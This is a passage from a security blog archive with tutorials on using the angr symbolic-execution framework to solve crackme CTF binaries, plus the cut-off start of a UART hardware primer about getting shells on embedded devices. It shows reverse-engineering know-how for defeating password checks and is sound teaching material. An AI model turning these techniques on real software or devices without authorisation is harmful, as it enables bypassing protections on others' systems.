<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3xJsSOYZhh7O3bglPrrAf0PAoVIycQP7iPsFvfS1kTDxRrL51DJyAhL9eYli-3V1VXukMSQwzVW5IBwtjsJrMokwFcVmRiTAwo7cVI65nqYVzhHNzC39jK0NctSyL9fTR7y1mFFrhrBk/s1600/Screenshot+from+2019-12-31+09-19-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="320" data-original-width="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3xJsSOYZhh7O3bglPrrAf0PAoVIycQP7iPsFvfS1kTDxRrL51DJyAhL9eYli-3V1VXukMSQwzVW5IBwtjsJrMokwFcVmRiTAwo7cVI65nqYVzhHNzC39jK0NctSyL9fTR7y1mFFrhrBk/s1600/Screenshot+from+2019-12-31+09-19-59.png" /></a></div>
<br />
<br />
<i>This one comes straight from the examples Angr provides, and as boring as it is to use as an example, I hafta admit the examples they provide are good. They are even provided in some form of grammar, so you can work out how to grow more examples from the ones the Angr folks provide (those of you dedicated to mastering this will appreciate that). It does mean you can find these explanations in other posts, but the upside is that it also gives you different workings and explanations of the same stuff. Often that redundancy really helps speed up cracking the strange enigmas involved in understanding symbolic execution (or anything for that matter!). </i><br />
<br />
Analyzing our binary we see the following important things:<br />
<ul style="text-align: left;">
<li>After reading the values via <span style="font-family: "courier new" , "courier" , monospace;">scanf</span>, the code from <span style="font-family: "courier new" , "courier" , monospace;">0x8048934</span> to <span style="font-family: "courier new" , "courier" , monospace;">0x8048944</span> loads them into the registers <span style="font-family: "courier new" , "courier" , monospace;">eax</span>, <span style="font-family: "courier new" , "courier" , monospace;">ebx</span> and <span style="font-family: "courier new" , "courier" , monospace;">edx</span>. It does this through the pointer arguments it gave to <span style="font-family: "courier new" , "courier" , monospace;">scanf</span>.</li>
<li>In main, after it calls <span style="font-family: "courier new" , "courier" , monospace;">get_user_input</span>, it stores the values of <span style="font-family: "courier new" , "courier" , monospace;">eax</span>, <span style="font-family: "courier new" , "courier" , monospace;">ebx</span> and <span style="font-family: "courier new" , "courier" , monospace;">edx</span> to memory through pointers, from <span style="font-family: "courier new" , "courier" , monospace;">0x8048980</span> to <span style="font-family: "courier new" , "courier" , monospace;">0x8048986</span>.</li>
<li><span style="font-family: inherit;">We can also see that at </span><span style="font-family: "courier new" , "courier" , monospace;">0x804898c</span> the binary passes the <span style="font-family: "courier new" , "courier" , monospace;">eax</span> value to <span style="font-family: "courier new" , "courier" , monospace;">complex_function_1</span>. In the same fashion, <span style="font-family: "courier new" , "courier" , monospace;">ebx</span> and <span style="font-family: "courier new" , "courier" , monospace;">edx</span> are passed to <span style="font-family: "courier new" , "courier" , monospace;">complex_function_2</span> and <span style="font-family: "courier new" , "courier" , monospace;">complex_function_3</span> respectively (at <span style="font-family: "courier new" , "courier" , monospace;">0x804899f</span> and <span style="font-family: "courier new" , "courier" , monospace;">0x80489b2</span>).</li>
</ul>
<div>
Skipping some unsurprising analysis, <span style="font-family: "courier new" , "courier" , monospace;">complex_function_1,2</span> and <span style="font-family: "courier new" , "courier" , monospace;">3</span> are crucial in determining our success, and they are clearly functions of our <span style="font-family: "courier new" , "courier" , monospace;">eax</span>, <span style="font-family: "courier new" , "courier" , monospace;">ebx</span> and <span style="font-family: "courier new" , "courier" , monospace;">edx</span> registers. We also probably don't need to model the memory pointers themselves, since the values are caught nice and neatly by 3 separate registers.<br />
<br />
We therefore want to use Angr to model these registers while avoiding the internals of <span style="font-family: "courier new" , "courier" , monospace;">scanf</span> and any unnecessary stack pointer/memory politics (<i>thanks to other blog posts on this subject, see "Reading and References"</i>). </div>
<div>
<br />
Here's our solution script:<br />
<script src="https://gist.github.com/k3170makan/10ed0aaf6a16ffde11bc05dc4fc88ae2.js"></script>
<br />
<br />
We can see some new hotness in the script in lines 16-18:<br />
<br />
<span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">init_state.regs.eax </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">=</span><span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;"> arg0</span><br />
<span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">init_state.regs.ebx </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">=</span><span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;"> arg1</span><br />
<span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">init_state.regs.edx </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;">=</span><span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; white-space: pre;"> arg2</span><br />
<span style="background-color: white; color: #24292e; font-family: , "consolas" , "liberation mono" , "menlo" , monospace; font-size: 12px; white-space: pre;"><br /></span>
<br />
Pretty straightforward: it gives the initial state a heads-up by tying a <span style="font-family: "courier new" , "courier" , monospace;">claripy</span> bit vector to each of the registers mentioned. This is a very simple example and doesn't involve much drama beyond the analysis needed to spot the registers we need to target.<br />
<br />
And as for the proof:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG4q_PbQu7fAhVx_tHg9DrFlVwVkk_ErWfguxh74lLkK1iwKF7ais7mKCgo0NV00xGzaQ2GGDK6R0eB2b7OuXetedbp_xNBstLzwjvC2qEptrhGyE-uDOXaipYxbguwmT0JVM0eG90u0I/s1600/Screenshot+from+2019-12-31+10-26-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="159" data-original-width="793" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG4q_PbQu7fAhVx_tHg9DrFlVwVkk_ErWfguxh74lLkK1iwKF7ais7mKCgo0NV00xGzaQ2GGDK6R0eB2b7OuXetedbp_xNBstLzwjvC2qEptrhGyE-uDOXaipYxbguwmT0JVM0eG90u0I/s1600/Screenshot+from+2019-12-31+10-26-11.png" /></a></div>
<br />
<br />
<br /></div>
It gets to the right solution! Anyway, that's it for this one; look out for more Angr goodness in future posts.<br />
<br />
<h3 style="text-align: left;">
Reading and References:</h3>
<ol style="text-align: left;">
<li>"Introduction to angr Part 1" - <a href="https://blog.notso.pro/2019-03-25-angr-introduction-part1/">https://blog.notso.pro/2019-03-25-angr-introduction-part1/</a></li>
</ol>
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-41332117212818266532019-12-29T04:34:00.003-08:002019-12-29T04:43:50.594-08:00[Symbolic Execution 0x0] Solving easy CTFs with Angr and Symbolic Execution <div dir="ltr" style="text-align: left;" trbidi="on">
Hi folks, I just learned a couple of nifty tricks with angr, a popular symbolic execution framework with a very slick Python front end. It turns out this tool makes solving the odd crackme CTF extremely easy. I've been porting the same script around for a number of CTF challenges and it's knocking 'em down like nobody's business. So in the following post I'm going to give you folks a quick crash course in using the tool and show you how easy it is to solve a sample crackme.<br />
<br />
<h3 style="text-align: left;">
What is Symbolic Execution</h3>
<br />
Without going into full academic detail, symbolic execution is essentially hard proof that all the algebra you learned in high school is kinda nifty. Symbolic execution engines model a program's behavior in terms of symbolic inputs rather than concrete values. These engines (<i>which may vary in their approach</i>) build a database of algebraic statements about a program. They sweep up the assignments and comparisons along each path that can lead to a given state, and you can then query these statements to see whether some assignment of the input variables makes that state reachable. To quote a really helpful paper on this:<br />
<br />
<blockquote class="tr_bq">
<br />
<i>More specifically, a symbolic execution engine replaces input with “symbolic input”—analogous to an algebraic variable—and walks through code paths, “constraining” the symbolic input at each branch such that an input to the program that satisfies all constraints will cause the program to reach that particular path. The engine can then explore many possible execution paths until it identifies a specific path or program state of interest, at which point it can determine the input which would trigger it.</i> - "Teaching with angr: A Symbolic Execution Curriculum and CTF∗" @ <a href="https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf">https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf</a> </blockquote>
<br />
Another good explanation:<br />
<br />
<i>Symbolic execution is a technique that explores feasible paths by setting an input value to a symbol rather than a real value. The symbolic execution was first published in King’s paper in 1975 [12]. This test technique was developed to verify that a particular area of software may be violated by the input values. The symbolic execution is largely divided into the offline symbolic execution and the online symbolic execution. The offline symbol execution solves by choosing only one path to create a new input value by resolving the path predicate [13]. - </i>An Automated Vulnerability Detection and Remediation Method for Software Security <a href="https://www.mdpi.com/2071-1050/10/5/1652">https://www.mdpi.com/2071-1050/10/5/1652</a><br />
<br />
The analogy to reach for here is that it's very similar to solving for "x" in an algebraic equation. We're going to look at a couple of different scenarios with Angr and see exactly how you solve for x. To start, we will take a simple approach and let Angr do most of the thinking for us, taking advantage of the clear signal a program gives when it reaches the desired state. In other words, we're going to make Angr explore until the program literally prints "Good job" or "correct" or whatever it prints to indicate success.<br />
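To make the "solve for x" analogy concrete, here is a toy path explorer in plain Python. It is only a sketch of the idea, not how Angr works internally. The hypothetical program is a tiny tree of branches, and every branch forks the path and records a constraint on x. A brute-force search over 0-255 stands in for a real constraint solver (Angr uses Claripy, which is backed by Z3).<br />

```python
# Toy path explorer illustrating the "solve for x" idea; NOT Angr internals.
# Real engines keep constraints as ASTs and hand them to an SMT solver; here
# each constraint is a Python predicate and the "solver" brute-forces 8 bits.

# Hypothetical program as a tree:
#   ("if", predicate, then_branch, else_branch)  or  ("print", text)
PROGRAM = (
    "if", lambda x: x * 3 + 7 == 100,
    ("if", lambda x: x % 2 == 1,
        ("print", "Good job"),
        ("print", "Nope")),
    ("print", "Nope"),
)


def explore(node, path=()):
    """Fork at every branch, yielding (path_constraints, output) per path."""
    if node[0] == "print":
        yield list(path), node[1]
        return
    _, pred, then_branch, else_branch = node
    yield from explore(then_branch, path + (pred,))
    # The else side records the negated predicate as its constraint.
    yield from explore(else_branch, path + (lambda x, p=pred: not p(x),))


def solve(constraints, domain=range(256)):
    """Return the first x in `domain` satisfying every constraint, or None."""
    for x in domain:
        if all(c(x) for c in constraints):
            return x
    return None


def find_input(target_output):
    """Return an input that drives PROGRAM to print `target_output`."""
    for constraints, output in explore(PROGRAM):
        if output == target_output:
            x = solve(constraints)
            if x is not None:  # skip infeasible paths
                return x
    return None


if __name__ == "__main__":
    print(find_input("Good job"))  # 31
```

Asking for the "Good job" path yields 31, because that path's constraints are 3x + 7 = 100 and x odd. The infeasible branch (x = 31 and even) simply has no solution and is skipped.<br />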
<br />
<i>Having read the above, don't assume this will take all of the reversing fun away. You will need to tell Angr where to start and stop and what to look for, and that insight comes from reading the code yourself. There may be more contrived "win states" or more complex phases to getting the correct input into a target function, so don't completely abandon your RE skills just yet hehe.</i><br />
<br />
<br />
<h3 style="text-align: left;">
Simple Example with Angr</h3>
<br />
The following example shows a CTF challenge I got from a random site. To spare the contestants of the site, I won't mention where it's from in case folks are still trying to solve this one. It's a pretty easy challenge, though, so I doubt too many will be super upset by the solution being shown here. Anyway, here's what the binary looks like:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijBlh4gV-CqJSraVnlDdd3Kb4swOdKiKITm4iyxwQ5NW6zVKdDF-0-19SiAW9Pk8a-vCO31oD2Jswfh0Xdv-IZZNkW-lcXYdZ9s_U9sit7itKRDeuCYvL42ygCJXHYZ9PTbS7M239c_mE/s1600/Screenshot+from+2019-12-29+03-23-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="803" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijBlh4gV-CqJSraVnlDdd3Kb4swOdKiKITm4iyxwQ5NW6zVKdDF-0-19SiAW9Pk8a-vCO31oD2Jswfh0Xdv-IZZNkW-lcXYdZ9s_U9sit7itKRDeuCYvL42ygCJXHYZ9PTbS7M239c_mE/s1600/Screenshot+from+2019-12-29+03-23-47.png" /></a></div>
<div>
<br /></div>
<div>
To give you a quick summary of what's going on:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">@0x830</span> we can see the binary grab the <span style="font-family: "courier new" , "courier" , monospace;">argv</span> pointer from <span style="font-family: "courier new" , "courier" , monospace;">rsi</span> and store it at <span style="font-family: "courier new" , "courier" , monospace;">rbp-0x20</span> (called <span style="font-family: "courier new" , "courier" , monospace;">var_28</span>)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">@0x858</span> <span style="font-family: "courier new" , "courier" , monospace;">argv[1]</span> is passed to a subroutine called "checkPassword()" via <span style="font-family: "courier new" , "courier" , monospace;">rdi</span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">@0x867</span> the return value of checkPassword (in the al register) is checked against 0. If it is 0, the win branch is taken and "Jackpot" is printed to the screen</li>
</ul>
</div>
<div>
<br /></div>
<div>
We aren't even going to cover what checkPassword does, or whether there's some cool xor crib or double pad to exploit; we don't need to know! Angr will sort out all the work for us, via the Al-Kawarithmic magic of algebra! </div>
<div>
<br /></div>
<div>
So now we know where to aim: we want to reach the code block <span style="font-family: "courier new" , "courier" , monospace;">@0x869 </span>by supplying a string through <span style="font-family: "courier new" , "courier" , monospace;">argv[1]</span>. Let's see if we can configure Angr to solve this.</div>
<div>
<br /></div>
<div>
<br /></div>
<h3 style="text-align: left;">
Controlling your Angr</h3>
<div>
<br /></div>
<div>
It can be a little overwhelming to jump straight in, so let's talk about the general process of breaking down a symbolic execution problem with Angr. Here's how the process usually goes:</div>
<div>
<ol style="text-align: left;">
<li><b>Define a win condition</b> - for the first couple of times you use Angr, and for most simple CTFs, this is as simple as telling it which address to look for as a reachable state, or telling it to report input that results in something being printed to the screen. </li>
<li>*(optional) <b>Define a fail condition </b>- you may not need to do this, but you can also tell Angr to avoid certain code blocks while it explores, which prunes the paths it has to search through. Again, this is just a simple criterion.</li>
<li><b>Load up a binary</b> - Not complex at all, this consists of a single API call to tell Angr which binary to analyze.</li>
<li><b>Define Variables</b> - this tells Angr which values you are ear-marking as inputs of interest, basically warning it to keep an eye out for how these values influence execution. This is also a simple set of API calls, though the complexity may vary depending on whether your values are in registers, come from the command line, or are just a collection of memory addresses. </li>
<li><b>Set an initial state </b>- Very important, this is us telling Angr's simulation manager where in the binary we want to get the party started. We can point it at any place in the binary, provided it makes sense to execute from there (<i>paying attention to stack setup and arguments!</i>)</li>
<li><b>Solve! </b>- this is the part where you tell Angr to make the magic happen. </li>
</ol>
<div>
So to summarize, you basically set up a starting execution state and then tell Angr to run all the goodness until a state matches a given criterion.</div>
</div>
<div>
<br /></div>
<h3 style="text-align: left;">
Scripting up a solution</h3>
<div>
<br /></div>
<div>
The following script details the solution. </div>
<div>
<br /></div>
<script src="https://gist.github.com/k3170makan/6285e75b6b264aabebe1e23281141072.js"></script>
<br />
<div>
<br /></div>
<div>
I've commented the crap outta this, but I will still walk through it line by line, as previous posts on the subject have.</div>
<div>
<br />
The first line doing anything interesting is line 8:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; color: #24292e; white-space: pre;"><br /></span></span>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">project </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> angr.Project(elf_binary) </span><span class="pl-c" style="background-color: white; box-sizing: border-box; color: #6a737d; white-space: pre;"><span class="pl-c" style="box-sizing: border-box;">#</span>load up binary</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span class="pl-c" style="background-color: white; box-sizing: border-box; color: #6a737d; white-space: pre;"><br /></span></span></div>
<div>
<br />
This essentially tells Angr which binary we want to target. The next line declares a symbolic bit vector (<span style="font-family: "courier new" , "courier" , monospace;">claripy.BVS</span>) so we can ear-mark the <span style="font-family: "courier new" , "courier" , monospace;">argv[1] </span>argument for constraint solving.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">arg </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> claripy.BVS(</span><span class="pl-s" style="background-color: white; box-sizing: border-box; color: #032f62; white-space: pre;"><span class="pl-pds" style="box-sizing: border-box;">'</span>arg<span class="pl-pds" style="box-sizing: border-box;">'</span></span><span style="background-color: white; color: #24292e; white-space: pre;">,</span><span class="pl-c1" style="background-color: white; box-sizing: border-box; color: #005cc5; white-space: pre;">8</span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">*</span><span class="pl-c1" style="background-color: white; box-sizing: border-box; color: #005cc5; white-space: pre;"><span class="pl-k" style="box-sizing: border-box; color: #d73a49;">0x</span>20</span><span style="background-color: white; color: #24292e; white-space: pre;">) </span><span class="pl-c" style="background-color: white; box-sizing: border-box; color: #6a737d; white-space: pre;"><span class="pl-c" style="box-sizing: border-box;">#</span>set a bit vector for argv[1]</span></span><br />
<br />
Why a bit vector? We want to represent every possibility for the input, and the answer may not be a simple printable character (<i>guessing only at the character level</i>) but some obscure pattern of bits. Telling Claripy we want a vector of individual bit values makes sure we don't miss any details. Here 8*0x20 asks for 256 bits, i.e. room for 32 bytes of input. Modeling the input this way is much more fine-grained and realistic. Imagine we are modeling some Linux driver input here: you definitely want all the possible bit values, since some will represent over/under-flowed integers.<br />
<br />
Claripy is Angr's constraint-solving layer (it sits on top of solver backends such as Z3). Again, we need not delve too deep into how it works. You can imagine that it builds abstract syntax trees from the operations the analyzed code performs on our symbolic values: the arguments stuffed into subroutines, arithmetic and comparisons. Values can also be modeled as a few different types (bit vectors, floating-point values, booleans) to capture different aspects of the input. Better coverage of this can be found in Angr's documentation (<a href="https://docs.angr.io/advanced-topics/claripy">https://docs.angr.io/advanced-topics/claripy</a> ).<br />
<br />
<i>I've made it way larger than it needs to be. If you'd like to model yours a bit tighter, you can use information from the disassembly to declare a smaller BVS for your script.</i><br />
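Once Angr finds a matching state, the solver hands back a value for this 256-bit vector, and you turn it back into the bytes you would type on the command line. In Angr that is usually a call like <span style="font-family: Courier New, Courier, monospace;">found.solver.eval(arg, cast_to=bytes)</span>, where <span style="font-family: Courier New, Courier, monospace;">found</span> is a hypothetical name for the found state. The sketch below mimics that conversion in plain Python. It assumes the big-endian layout claripy uses (first character = most significant byte) and cuts at the first NUL, the way a C program reads a string. It also shows how an oversized vector simply pads out with zero bytes.<br />

```python
# Sketch: turning a solver's answer for the argv[1] bit vector back into the
# string you would type. Assumes a big-endian layout (first character = most
# significant byte). In Angr you would normally call
# found.solver.eval(arg, cast_to=bytes) instead; `found` is hypothetical.

ARG_BITS = 8 * 0x20  # same size as claripy.BVS('arg', 8*0x20): 256 bits, 32 bytes


def bits_to_argv(value: int, nbits: int = ARG_BITS) -> bytes:
    """Convert an nbits-wide solution to bytes, cut at the first NUL the way
    a C program would read argv[1]."""
    raw = value.to_bytes(nbits // 8, "big")
    return raw.split(b"\x00", 1)[0]


if __name__ == "__main__":
    # Hypothetical solver output: "hi" followed by zero padding.
    solution = int.from_bytes(b"hi".ljust(32, b"\x00"), "big")
    print(bits_to_argv(solution))  # b'hi'
```
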
<br />
Just grabbing an instance of a bit vector is not enough to make Angr pay attention to it. We need to stuff it into a call that associates it with our project's initial state, and that happens in line 11:<br />
<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">initial_state </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> project.factory.entry_state(</span><span class="pl-v" style="background-color: white; box-sizing: border-box; color: #e36209; white-space: pre;">args</span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;">[elf_binary,arg]) </span></span><br />
<br />
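The <span style="font-family: "courier new" , "courier" , monospace;">args</span> list becomes the program's argv, so the binary's path is <span style="font-family: "courier new" , "courier" , monospace;">argv[0]</span> and our symbolic <span style="font-family: "courier new" , "courier" , monospace;">arg</span> lands in <span style="font-family: "courier new" , "courier" , monospace;">argv[1]</span>. Nothing too hard here. We then use this state to set up our simulation manager, the thing that steps through our program and checks for the goodness, in lines 12-13:<br />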
<br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">simulation </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> project.factory.simgr(initial_state)</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">simulation.explore(</span><span class="pl-v" style="background-color: white; box-sizing: border-box; color: #e36209; white-space: pre;">find</span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;">is_successful)</span></span><br />
<br />
Angr's simulation manager is pretty nifty; I recommend taking a look at the other amazing options and API calls fleshed out for it here (<a href="https://docs.angr.io/core-concepts/pathgroups">https://docs.angr.io/core-concepts/pathgroups</a>). For our purposes we will stick to telling it where to start and when to consider its exploration a success. The last part we need to define is the win state. In line 13 we gave the explore function a parameter named "<span style="font-family: "courier new" , "courier" , monospace;">is_successful</span>". This is a function that Angr calls on the states it reaches to check whether they match our goal, so we need to tell it when to return True or False. For us this means checking the standard output for the string "Jackpot":<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">def</span><span style="background-color: white; color: #24292e; white-space: pre;"> </span><span class="pl-en" style="background-color: white; box-sizing: border-box; color: #6f42c1; white-space: pre;">is_successful</span><span style="background-color: white; color: #24292e; white-space: pre;">(</span><span class="pl-smi" style="background-color: white; box-sizing: border-box; color: #24292e; white-space: pre;">state</span><span style="background-color: white; color: #24292e; white-space: pre;">):</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">    output </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> state.posix.dumps(sys.stdout.fileno())</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">    if</span><span style="background-color: white; color: #24292e; white-space: pre;"> </span><span class="pl-s" style="background-color: white; box-sizing: border-box; color: #032f62; white-space: pre;"><span class="pl-k" style="box-sizing: border-box; color: #d73a49;">b</span><span class="pl-pds" style="box-sizing: border-box;">'</span>Jackpot<span class="pl-pds" style="box-sizing: border-box;">'</span></span><span style="background-color: white; color: #24292e; white-space: pre;"> </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">in</span><span style="background-color: white; color: #24292e; white-space: pre;"> output:</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">        return</span><span style="background-color: white; color: #24292e; white-space: pre;"> </span><span class="pl-c1" style="background-color: white; box-sizing: border-box; color: #005cc5; white-space: pre;">True</span></span><br />
<span class="pl-c1" style="background-color: white; box-sizing: border-box; color: #005cc5; font-family: Courier New, Courier, monospace; white-space: pre;"><span class="pl-k" style="box-sizing: border-box; color: #d73a49;">    return</span><span style="color: #24292e;"> </span><span class="pl-c1" style="box-sizing: border-box;">False</span></span><br />
<br />
This is a typical callback-style API: you pass the function in as a parameter, and the internal magic of Angr calls it over and over until it returns True. What you should pay attention to here is the parameter passed to it. Later on you may want to be a bit more creative than just string-matching the standard output, so check out what other properties a "state" has in Angr's docs; they will give you other ideas for conditions you can configure the simulation manager to halt on. Obvious examples are register values (eip, eax, etc.), values in a given memory region, or how many times a given code block is hit. The possibilities are endless (<i>with the exception of whatever the halting problem prevents you from using as a criterion lol</i>).<br />
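Here is a sketch of a matching pair of predicates for <span style="font-family: Courier New, Courier, monospace;">simulation.explore(find=..., avoid=...)</span>. The second one covers the optional fail condition from the process list. The failure string "Wrong" is a hypothetical placeholder, not taken from this binary. The small fake state classes are stand-ins so the predicates can be tried without Angr; a real state exposes <span style="font-family: Courier New, Courier, monospace;">state.posix.dumps(fd)</span> in the same way.<br />

```python
# Win/fail predicates for simulation.explore(find=..., avoid=...).
# STDOUT_FD is 1, which is what sys.stdout.fileno() returns in a normal
# terminal. The b"Wrong" failure message is a hypothetical placeholder.
STDOUT_FD = 1


def is_successful(state):
    """Win condition: the program has printed b'Jackpot' on stdout."""
    return b"Jackpot" in state.posix.dumps(STDOUT_FD)


def should_avoid(state):
    """Hypothetical fail condition: a failure message appeared on stdout."""
    return b"Wrong" in state.posix.dumps(STDOUT_FD)


# Minimal stand-ins for an angr state so the predicates run without angr.
class FakePosix:
    def __init__(self, stdout):
        self._stdout = stdout

    def dumps(self, fd):
        # Only stdout has content in this fake; other fds look empty.
        return self._stdout if fd == STDOUT_FD else b""


class FakeState:
    def __init__(self, stdout):
        self.posix = FakePosix(stdout)


if __name__ == "__main__":
    print(is_successful(FakeState(b"Jackpot\n")))        # True
    print(should_avoid(FakeState(b"Wrong password\n")))  # True
    # With Angr: simulation.explore(find=is_successful, avoid=should_avoid)
```

Passing an <span style="font-family: Courier New, Courier, monospace;">avoid</span> predicate lets the simulation manager drop states that have already failed instead of continuing to step them.<br />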
<br />
<br />
Running this, we see it quickly finds the right string:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTnu5cpdt7n2LmTXaNLBxLfanZV9uPghPCsi4aXGy2gGimRRXYdCDhqTx8b22ZW1G0nPgORp9c7A3zQFStP3IKwvWxjgbHpsu_GRZTFZSR9HjeOeVQNIrUR0ZD7x-b5klULtDWL-1JquA/s1600/Screenshot+from+2019-12-29+03-53-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="434" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTnu5cpdt7n2LmTXaNLBxLfanZV9uPghPCsi4aXGy2gGimRRXYdCDhqTx8b22ZW1G0nPgORp9c7A3zQFStP3IKwvWxjgbHpsu_GRZTFZSR9HjeOeVQNIrUR0ZD7x-b5klULtDWL-1JquA/s1600/Screenshot+from+2019-12-29+03-53-57.png" /></a></div>
<br />
<br />
Okay, so that's pretty solid proof we have the correct answer. If you've just started out with Angr, you may want to grab this script as a starting point and make small modifications to it to see if you can pump out solutions for other CTF challenges.<br />
<br />
Happy hacking!</div>
<h3 style="text-align: left;">
Reading and References</h3>
<div>
<br /></div>
<div>
<ol style="text-align: left;">
<li>Introduction to Angr (part 1) <a href="https://blog.notso.pro/2019-03-25-angr-introduction-part1/">https://blog.notso.pro/2019-03-25-angr-introduction-part1/</a></li>
<li>Angr official documentation <a href="https://docs.angr.io/">https://docs.angr.io/</a> </li>
<li>Teaching with angr : a Symbolic Execution Curriculum and CTF* - <a href="https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf">https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf</a></li>
</ol>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-49847277466797616032019-06-03T12:52:00.000-07:002019-07-06T14:46:01.017-07:00[Hardware] Reverse Engineering UART interfaces (Primer)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<i>In this post I'm going to run through a crash course on UART and write up some personal notes I use to find UART ports quickly and dump shells on embedded devices. So it's going to be a little informal at times, but the aim of the post is to get the tips and process across quickly so that those who want to can get to dumping shells too! It's focused on interacting with UART ports as they appear on an average IoT device. </i><br />
<br />
<i><br /></i>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_yDQl8D8ppcu65iiPuUGkpaaeLsOquvlCb0zmPuhdIBj3qWkldUyuT9rRqrinuYNbDSpKAn07ky8mXNZhe4GNPySRU7JYVS6gI2UWQxro_ZRBQTWDC-_kfYhpqjGMfY2yOrAs_vYhhgk/s1600/Screenshot+from+2019-04-19+21-31-01.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="413" data-original-width="651" height="406" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_yDQl8D8ppcu65iiPuUGkpaaeLsOquvlCb0zmPuhdIBj3qWkldUyuT9rRqrinuYNbDSpKAn07ky8mXNZhe4GNPySRU7JYVS6gI2UWQxro_ZRBQTWDC-_kfYhpqjGMfY2yOrAs_vYhhgk/s640/Screenshot+from+2019-04-19+21-31-01.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">This is me dumping UART traffic from a device using the Adafruit FTDI Serial TTL-232 cable.</span></td></tr>
</tbody></table>
<i><br /></i>
<br />
<h3 style="text-align: left;">
